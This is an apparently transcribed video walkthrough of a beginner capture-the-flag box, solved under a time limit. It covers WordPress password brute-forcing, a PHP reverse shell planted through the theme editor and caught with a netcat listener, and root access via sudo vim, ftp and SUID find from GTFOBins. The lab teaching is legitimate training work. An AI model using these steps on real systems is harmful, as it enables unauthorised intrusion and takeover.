Hello, welcome to Sabretooth at Nethemba, where we care about your security. We have an easy box here for Try Help Me Tuesday, but also a challenge from Rick. This says 70 minutes. He's asked me to do it in 30. I've got half an hour to get into this box. The timer starts. Okay, I've already got a timer there for 20. Let's edit that. The timer starts when I get the IP, and the timer stops when I get the root flag. Or whatever, right? So I guess we're going to start the system. Generally I'll have this started by now, but just thought I'd say, can you gain access? Can you get access and get both flags? All we've got here is user and root.txt. Hints now apparently are handled by the I thought the hints were okay. Well, all it says is provide the flag, so that's okay. Because that doesn't affect the solving of the box. That's just putting the flag in here. So I'm not counting that as a I'm not counting that as a spoiler at all, right? So I still need to be able to get into the system, get the root flag. I've got 30 minutes to do so. I'll tell you what I have got ready, Burp Suite, and I've also got ready MSF. What I've not got ready is Netcat, Nmap, T5, all ports, A flag on 10, 10 something, something. The one thing is said about this box is be sure to 2.16.0. Be sure to don't overlook the most basic stuff, because this is a beginner's box. So I'd quite like to. Hang on. Got my timer going now. So I'm gonna have to do things like try exploits, which I might overlook, brute force passwords, which I generally leave till later, avoid UDP scans, there's not going to be any UDP in this, and so on and so forth. So we'll just see how it goes. Half an hour is going to be a bit of a push probably, but hopefully it won't be too bad. We've got port 80, and we've got the SSH on 4512, which is quite interesting. So let's go here, 10.10, 2.16.0. Welcome to ColldBox, a machine designed by Cold. It's a very simple machine to solve with several. I'll tell you what I could do to start with. I think this is WordPress. Could go admin straight off. Okay, well, I guess not. That's fine. So it is WordPress, definitely, and it even says it down here. You can usually tell just by the layout. So let's go robots.txt, which probably won't exist. Let's do GoBuster. Okay, that's the calamari. I hate seafood from. Oi. What's going on? Go away. Try again. The calamari. I hate seafood from the other box we did. We can get rid of that proxy, and we can put in this IP here without the extra HTTP, and we'll just see what this comes up with. We've got hidden, we've got WP admin. Hidden is interesting. Let's have a look at this. Cold, you changed Hugo's password, Philip. So we've got three usernames here. So WordPress site, GoBuster shows hidden, which contains. I should see what else it's actually got as well. So we've got some usernames. Let's see what else this has. Nothing important that I can see. Good. WP scan is the way forward. And we're going to 10. I'm not panicking, because the second I start panicking is the second I sort of lose this. We're going to enumerate all users. Okay. That's better. Oh, what? Thank you very much for that. We're going to enumerate all users. We are going to enumerate all plugins with, I can't remember what it's called. I can't remember how to set the mode, passive or whatever. What is it? Plugins detection. That's the one. So we'll do that with plugins detection as aggressive. Okay. Okay, so we've got some users here, Hugo, Cold, and Philip. That doesn't quite surprise me at all. That's all it kind of finds. Okay, fine, we'll take that then. Whoa, go away. Okay, so I suppose I could just try a brute force with users Hugo, Cold, and Philip, and for passwords we can use tools wordless fast track, because that's the quickest one, or one of the quickest ones, and just see if that comes up with anything. Where's my timer? It's down here. So 24 minutes and 57 seconds left. That's not so bad. We've been 5 minutes so far. Okay, so let's see how this is. I should just, I hate this auto update thing. If I don't put update, don't remind me to update. Should just update it, really. Bit of a waste of time there, isn't it? Okay, that doesn't work, so let's go with rock you, but this is a really, really big file. This is a really big file. Ping. So the plugins haven't even started yet by the looks of it. And neither is this. What's happening? What? Oh, it's still working, isn't it? Oh, now it's working. Okay. Oh yeah, there it goes. It's just taking a while. I honestly don't know what to do. So I'm going to, looking at the timer at the bottom here, where it says like new entry 23 minutes remaining. I'm going to leave these brute forces going until there's 20 minutes remaining. And at that point, I'll try something else, right? Because then I see it as 10 minutes to get shell, 10 minutes to get root, which may be possible. So it's 10 minutes sort of brute forcing and doing this sort of thing. 10 minutes really concentrating on shell, 10 minutes concentrating on brute. If given 30 minutes, that's the way I'd do it. Split 10, 10, 10. So I'm just waiting for the next 2 minutes 40, unless something comes up in the meantime. That's going to take 15 minutes and longer. What's the name of that program which does that a lot quicker on the plugins? I'll tell you what, I'll look that up. I'll look that up because I've done this before. Let's just look for plugins and see if I can find it. I can't remember the name of it. Plugins. Yeah, it's WordPress. I can't remember the name of the software. Huh. What if I change my query to is met? Was it Mountaineer? Plugins identified. No, that was using WordPress scanner. Ah, WP probe scan. There we go. That was the one. So I knew I found it somewhere. Mode brute force. Right, so let's copy that. And we'll go back to ColldBox. Just see how this is doing. Oh, hang on, we've got a username and password. I might not need to do the plugins, guys. Right, okay, hang on. Okay. With brute force options with RockU. I might not need to 98765432110. Okay. I might not need to do the plugin thing then. I was getting ready to do it. How are we doing with time? Yeah, I've got 20 minutes 30. That's plenty of time. Let's leave that running. Let's go to WP admin. Yep. Let's try it again with a hyphen in there. That's it, 20 minutes remaining. So we're a third of the time. I'll tell you what I will do, just in case this does let me in. I will cat out shells php reverse shell.php. I'll also do ifconfig to check my IP. It's 10.14.102.67, and this is 10.14.102.67. Perfect. We will copy this just in case. That has let us in. Brilliant. This gives us access to WP admin. So it's just a case of replacing the template. You know, we've done this sort of thing many times. Appearance editor, and then we find the template, change the 404 page generally to our own code. And then update the file. Okay, we're going to get a listener going, NC LVP1234. Now, I'll show you a trick that one of my users showed me, because what I generally do at this point, I'd find out where 2015 is, and I'd find the whole path and go from there. And it does actually say in here, it does actually say here that there's the whole path, and I can go to 404.php. But if you want to load the 404 PHP of the theme you're using, you can just put a question mark and then put page equals 404.php, and then hopefully, in theory, we get a shell. Brilliant. So who am I? www data. Is there any sudo here? We don't know, so import Python. No. Python. Import pty spawn bin bash. Oh, what's happened? What's gone wrong? Oh, I've not put the C in there. Python. I knew there was something missing, because I was like, so that doesn't seem right. That's fine. We'll just copy that. Paste that in. Okay. I'm confused. Right, whatever. So who am I? I've not got time. I've not got time to figure out what idiocy I'm going through at the minute. So there's something going wrong somewhere, and I can't think what. So let's just get Limpies on here and see what this finds. So we're going to cd into temp. We're going to wget http 10.14.102.67/limpies.sh. But first, I know you're all going to yell at me. Don't worry. Don't worry, I have not forgot. I don't need that anymore. I've got a shell now. So clear that. Let's go into Prives scripts. Sudo python 3 http server on port 80. So that's running our server in this directory. And that means that we should be able to just get that straight off. Chmod. And then limpies. What's happened? Yay! Okay, right. How are we doing for time? 15 minutes and 50 seconds. So, limpies hopefully won't take too long to run, but it might. Is there anything else I could be doing? I could be looking around the system. I could. It involves me killing my shell and getting another one now. Huh. Yeah, let's just wait for this. Oh god, it's the longest. Caching writable folders is going to take like an hour. You watch. Right, here's the goal. If it's going to take this long, how about we say the timer's got 15 minutes left. Limpies until 10 minutes remaining. What do we think? And then we can use the final 10 minutes to root. I'm not saying that I'm going to sit here doing nothing for 5 minutes, but I am saying that I'm going to sit here doing nothing until limpies is done, because I doubt it's going to take a full 5 minutes. The main thing to do when under time pressure is just keep calm, because the more you panic, it's the whole thing where people say more haste, less speed. Like the hastier you are, the slower you end up going. As it happens, I've gone over half of my available time, but we are in the system. This is a beginner's box, and it even said here, multiple ways to escalate privileges, right? So I'm assuming this is not going to be difficult, and limpies is going to be flashing yellow and red all over the place. It'd be nice if so. That's why I'm not panicking. So I've got 3 minutes 50 remaining until I decide to kill limpies and try it my way. But I'm rather hoping caching directories hurries up soon. I don't want to stop the video, you see. Normally I would, I'd say I'll stop and I'll come back when something's been found, but on a challenge box, I can't run the risk of, oh, well, you know, you could have been doing stuff whilst away from camera and then come back and pause the timer and restart the timer and whatever. And even this clock down here in the very, very bottom right, the operating system clock, or you could have modified the clock and made it look like no time had passed. Now, I'm an honest guy and you should know that by now, but I don't want to take any chance. I mean, if you think about my previous videos, which have been an hour and 50 on Joker and a good solid chunk on the systems before that, Racetrack Bank and so on. Having a system here, even with me talking in the middle like this, and the video only being about 40 minutes, I assume, because if this is half an hour box, and then 10 minutes, you know, gumph, it's still a lot better than, you know, it would have been. So if you want to fast forward and wait until this caching directory is done, then by all means do. I'm getting a little bit twitchy. Oh no, it's good. Almost good. I said I'm getting a little bit twitchy that we're down to 12 minutes and this is still not moved on from caching directories. Now it has. Right. I was just getting a little bit twitchy about that. I didn't know how long it's going to take. So, I mean, technically I could here use a kernel exploit. Generally I don't do that, but if I'm on a time constraint, I could use a kernel exploit to, what was it, Ubuntu 16? Yeah, absolutely I could. Maybe I could use like Dirty Sock or Dirty Cow or something like that. However, the exploit suggester seems not to be working today. Oh man, now I'm getting a little bit panicky. We're on 11 minutes left and Limpies is still hardly started. If you're going to make a box which is for beginners, why on earth would you make it so that the previous scripts either don't work or take ages? It's baffling to me. But whatever, it is running, and we do have some exploits here, Dirty Cow, which should work. I'm looking for some yellow red, really. I'm looking for some yellow red, which would be quite nice if I can. I'm actually just letting it scroll. I don't normally do this. I normally like to scroll up and then go down in my own time, but as it happens, I'm just looking to see if there's anything which stands out. Speaking of which, no, it's fine, it's still going. Yeah, there's a lot being run by www. Now here where it starts pinging all over the place is where I need to start taking a proper look, because it moves too quick for me to see otherwise. Cron jobs, socket files. We've got that SSH running on 4512. Oh, that's what I could have tried. Am I an idiot? SSH is cold a member on the system though. I didn't check the etc password, did I? At 10 what was it, 216.0, was that right? It was right. Could I have tried the on port, was it 4512 or something? Cool, nice. Okay, so okay, well that doesn't work. Okay, that doesn't work. I thought it might, but it doesn't. Eight minutes remaining. Okay, well, so I've got that. So I've got access to the database with the password cybersecurity. I mean, to be fair, maybe that's the SSH password as well. We've got a suid on find, which is nice as well. Suid on find. Okay, I've got a few things to get on with. I just actually want to try this, just to see if I can. Cybersecurity. Oh my god. Okay. Cybersecurity allows access to SSH. So we've got a suid on find. Check sudo out just because. Oh, and we've got some it's in Spanish, but we've got some things we can run as sudo. Okay, should be easy from here. If it doesn't matter if we use it doesn't matter which one of these we use, whether we use find as a suid or whether we use vim or chmod or ftp, the result's going to be the same. What you need to do is go hack resources, GTFO bins, and we can just pick the first one off this list, like vim, for example. We can get, that's what I'm doing. Go vim, and then look for sudo on vim right there. I've not got and then you just run that, I think. First, let us cat user.txt and then run this. And then cat root.txt. Yeah, cat root.txt. And that's it, guys. I mean, with there, let's stop the timer with 4 minutes 50 remaining. That's fantastic. We did it in about 15 minutes-ish, give or take. A little bit anticlimactic. There's so many ways through at the end. Why didn't that? Oh, my own fault. I'm stupid. Easy system. I know it's meant to be, but it's good that, you know. So, just to fill this out a little bit, let's exit from the shell. Oh my god, how do we close Vim? There we go. How do we close Vim? So, let's try another one. We're going to do all of these methods. Another way in was chmod. So, we can do the same. Go back here and go chmod sudo, and we can use this to change a file. We can do this to change a file like etc shadow, and then we can write our own hash to there and gain access. I'm not going to do that, it's too faffy, but that's possible. And then we've got FTP as well, which I think should be an easier one. So you can go FTP and then sudo FTP followed by exclamation mark bin.sh. So okay, that works as well. So the one thing we've not done is the find. Where was it? User bin find. Okay. So if we look for find here as well with SUID, we can try this with user bin find. So that's 3 different ways to root. At least 3, maybe even 4, but one of them I didn't want to go through. So 4 different ways to root right there. And they're all done using GTFO bins, which is fantastic, really. Let's get this finished. What a nice box. Very simple, but as well as that, quite awkward with a time constraint. So we know to do these in encrypted format, in encoded, format. It did say that in the hint, but that's okay. We would have figured that out one way or another. I'm interested in decoding them to see what they say. It's base 64, but I can't be bothered. Rick, thank you for the challenge. Thank you for the challenge. We did it with about 5 minutes left, which isn't bad really. 25 minutes on a 70-minute box. Thank you all for joining. Please leave a like, please subscribe if you haven't already. Share the video around, share the playlist around if you can, and visit nethemba.com for all your pen testing needs. See you next time. Goodbye.